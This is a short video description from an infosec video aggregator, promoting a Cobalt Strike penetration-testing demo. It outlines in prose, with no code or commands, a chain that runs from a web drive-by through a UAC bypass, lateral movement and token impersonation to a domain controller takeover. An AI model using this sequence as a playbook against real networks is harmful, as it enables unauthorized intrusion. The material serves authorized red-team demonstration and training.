Description: This happy demonstration starts with a web drive-by attack. The drive-by lands us in a medium integrity process on Windows 7. We get past UAC and assume the full administrator rights of the current user. We enumerate hosts on the network--without scanning! We find out that we are a local administrator on another server. We use this trust to get control of that other server. We then find a process running as a domain administrator and impersonate that access token. This allows us to take over the domain controller. This is demolishing Windows Enterprises 101--with a slight twist: we do all of it from Cobalt Strike's "low and slow" Beacon payload over DNS and SMB. Meterpreter makes one short appearance too :) http://www.advancedpentest.com/
Tags:
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.